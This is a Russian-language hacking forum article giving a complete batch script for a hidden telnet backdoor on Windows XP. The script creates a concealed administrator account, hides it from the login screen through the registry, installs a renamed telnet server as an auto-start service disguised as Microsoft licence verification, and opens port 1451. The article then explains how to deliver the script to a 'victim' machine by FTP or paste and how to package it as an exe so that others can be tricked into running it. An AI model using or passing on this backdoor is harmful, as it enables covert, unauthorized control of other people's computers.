Скрытый telnet доступ к Windows


Данная статья предназначена для пользователей умеющих пользоваться консолью и знающих о telnet'е. Всё приведйнное ниже тестилось на машинах под управлением операционной системы Windows XP SP2.


1,2. Для тех, кто имеет доступ к машине.
2. Для впаривающих.
3. Развязка


1. Нам нужно паписать батник, в котором прописываются все параметры будущего телнета.

Вот собсно и он, run.bat (в архиве):

chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 pas /add
net localgroup "Администраторы" SUPPORT_388945a0 /add
net localgroup "Пользователи" SUPPORT_388945a0 /del
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe"
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
tlntadmn config port=1451 sec=-NTLM
net start "Проверка подлинности Microsoft Windows"

Расшифровываю:
chcp 1251 - переходим на 1251 кодировку, без этого не как, иначе нужно будет перекодировать в досовскую кодировку, например группа "Администраторы" будет такова "Ђ¤¬Ё*Ёбва*в®ал".
net user SUPPORT_388945a0 /delete - удаляем стандартного скрытого юзверя.
net user SUPPORT_388945a0 pas /add - добавляем его-же, только каплю подделаем его под себя. pas - вместо этого нужно ввести пароль.
net localgroup "Администраторы" SUPPORT_388945a0 /add - добавляем юзверя SUPPORT_388945a0 в группу "Администраторы".
net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" - Берёт стандартный файл сервера tlntsvr.exe, копирует его в ту же директорию, только уже под другим именем (tlntsevr.exe).
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg - изменение реестра, сначала воспроизводится написанное, за тем импортируется в реестр. SUPPORT_388945a0 - данный юзверь сдесь скрывается от посторонних глаз, т.е. не будет отображаться во время входа в систему, при просмотре пользователей через панель управления и т.д. (конец в ветке "UserList" без пробелов! почему-то исправляется...).
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP - создаём службу, %windir%\system32\tlntsevr.exe - путь до файла сервера телнета, "Проверка подлинности Microsoft Windows" - название службы.
sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." - её описание.
tlntadmn config port=1451 sec=-NTLM - порт 1451
net start "Проверка подлинности Microsoft Windows" - старт службы


2. Вот мы зашли на машину через некий telnet или его подобие, переходим в любую директорию. На своей машине запускаем ftp сервер, например Pablos ftp server (в архиве), переходим во вкладку User Accounts, там всё интуетивно понятно, указываем дынные для конекта.
В консили переходим в нужную директорию, за тем пишем:
------------
Способ 1.
------------

ftp
open 111.111.111.111
SUPPORT_388945a0
pas
get run.bat
bye
"run.bat"

ftp - угадайте что
open 111.111.111.111 - открыть ип 111.111.111.111 (ваш ип).
SUPPORT_388945a0 - логин пользователя.
pas - пароль.
get run.bat - отправить наш батник.
bye - выйти из ftp
"run.bat" - запустить батник (при нужде вводим путь).
------------
Способ 2. Тут нам вообще не нужен ftp и вообще на много меньше мороки, но всеравно, попробуйте и первым способом.
------------
Копируем код батника, маус 2 в консоли, волшебный пункт "Вставить" (у кого-то Past ), жмём Enter и всё))
Ну да, да...очень сложно... но первый способ всеравно попробуйте))


3. Ну и самое интересное и долгожданное:
Вводим в консоль:
telnet 222.222.222.222 1451
222.222.222.222 - ип жертвы
1451 - порт
Хотя зачем это разъяснять, если вы умееть пользоваться телнетом, но вдруг кто-то уже забыл).

Что бы создать .exe юзаем программу "Bat To Exe Converter" (в архиве).

Архив к статье: http://depositfiles.com/files/7783083 (537.94Kb).

п.с. подобная статья на этой ветке от StG-44 с его взглядом на телнет http://forum.antichat.ru/thread68300.html